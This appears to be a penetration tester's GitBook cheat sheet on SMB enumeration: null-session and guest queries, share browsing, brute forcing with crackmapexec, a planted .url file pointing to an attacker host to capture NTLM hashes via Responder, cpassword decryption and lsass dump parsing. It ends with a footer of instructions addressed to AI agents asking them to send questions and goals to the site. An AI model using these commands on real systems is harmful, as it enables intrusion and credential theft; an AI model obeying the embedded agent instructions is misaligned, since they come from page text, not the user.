> For the complete documentation index, see [llms.txt](https://thescriptkid.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thescriptkid.gitbook.io/notes/credential-less-enumeration/server-message-block.md).

# Server Message Block

## Footprinting The Service

### Nmap

{% code overflow="wrap" %}

```
sudo nmap 10.129.14.128 -sV -sC -p139,445
```

{% endcode %}

<figure><img src="/files/aIER3zF6bENi6Y877Unb" alt=""><figcaption></figcaption></figure>

### RPCclient

{% code overflow="wrap" %}

```
rpcclient -U "" 10.129.14.128
```

{% endcode %}

<figure><img src="/files/oI8WZfg1O9vuPH8vGiOf" alt=""><figcaption></figcaption></figure>

```
rpcclient -U'%' 10.10.110.17
```

<figure><img src="/files/UVC4PSuKisjEqSO0bCLk" alt=""><figcaption><p><code>-U'%'</code>: Explicitly sends an empty username and no password. <code>-N</code>: Does not send any username or password, attempting to establish a null session.</p></figcaption></figure>

| Query                     | Description                                                        |
| ------------------------- | ------------------------------------------------------------------ |
| `srvinfo`                 | Server information.                                                |
| `enumdomains`             | Enumerate all domains that are deployed in the network.            |
| `querydominfo`            | Provides domain, server, and user information of deployed domains. |
| `netshareenumall`         | Enumerates all available shares.                                   |
| `netsharegetinfo <share>` | Provides information about a specific share.                       |
| `enumdomusers`            | Enumerates all domain users.                                       |
| `queryuser <RID>`         | Provides information about a specific user.                        |

## Search For Known SMB Version Vulnerabilities

## Check For Shares Using Null Sessions

```
smbclient -N -L //$ip/
```

```
cme smb $ip --shares -u "guest" -p ""
```

## Brute Forcing

```
cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'
```

<figure><img src="/files/IjgKBvf77iz3GX6u1IAm" alt=""><figcaption><p>If the target</p></figcaption></figure>

## URL File attacks

*Test for URL File attacks by creating a file called "@somename.url" with the following contents, upload, spin up smbserver to capture hash*

```
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1
```

*Run Responder to capture hashes*

```
/opt/Responder-3.1.3.0/Responder.py -I tun0
```

## Read / Upload access

*Attempt to download and view share contents using valid credential / anonymous login / null session*

```
smbmap -H $ip
```

<figure><img src="/files/4V0w0WE3Gz9IvZxB6FfF" alt=""><figcaption></figcaption></figure>

```
smbmap -H $ip -r 
```

<figure><img src="/files/cvVFvE26MhPP7wCPmXIj" alt=""><figcaption><p>Using <code>smbmap</code> with the <code>-r</code> or <code>-R</code> (recursive) option, one can browse the directories</p></figcaption></figure>

```
smbmap -H 10.129.14.128 --download "notes\note.txt"
```

<figure><img src="/files/F9mB2mOzWK5tIYJwIQGC" alt=""><figcaption><p>Downloading</p></figcaption></figure>

```
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
```

<figure><img src="/files/ybC2WLFDcqfC5gEbv5BK" alt=""><figcaption><p>Uploading</p></figcaption></figure>

```
smbmap -u guest -p "" -H $ip -A '.*' -R
```

## Cpassword discovery

*Search "Groups.xml" for cpassword decryption*

```
gpp-decrypt cpassword
```

## lsass.zip lsass.dmp

*search lsass.zip or lsass.dmp to use to dump credentials / keys / tickets*

```
pypykatz lsa minidump "lsass.zip"
```

## Alternate Data Streams (ADS)

*test for alternate data streams after discovering 0 byte files*

```
allinfo filename
```

## Check Password Policy

```
cme smb $ip --pass-pol -u guest -p ""
```

## User Discovery

*Check For users using valid credential / anonymous login / null session*

```
cme smb $ip --users -u guest -p ""
```

```
cme smb $ip --rid-brute -u guest -p ""
```

## Group discovery

*check for groups using valid credential / anonymous login / null session*

```
cme smb $ip --groups -u guest -p ""
```

## Smbclient

*Interactively access the smb shares using smbclient*

```
smbclient //$ip/someshare -N
```

```
smbclient //$ip/someshare -U 'guest' -N
```

```
smbclient //$ip/someshare -U 'validuser' -p 'validpass'
```

## Smbmap

```
// Some code
```

## Dangerous Settings

| Setting                     | Description                                                         |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes`          | Allow listing available shares in the current share?                |
| `read only = no`            | Forbid the creation and modification of files?                      |
| `writable = yes`            | Allow users to create and modify files?                             |
| `guest ok = yes`            | Allow connecting to the service without using a password?           |
| `enable privileges = yes`   | Honor privileges assigned to specific SID?                          |
| `create mask = 0777`        | What permissions must be assigned to the newly created files?       |
| `directory mask = 0777`     | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh`  | What script needs to be executed on the user's login?               |
| `magic script = script.sh`  | Which script should be executed when the script gets closed?        |
| `magic output = script.out` | Where the output of the magic script needs to be stored?            |


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://thescriptkid.gitbook.io/notes/credential-less-enumeration/server-message-block.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
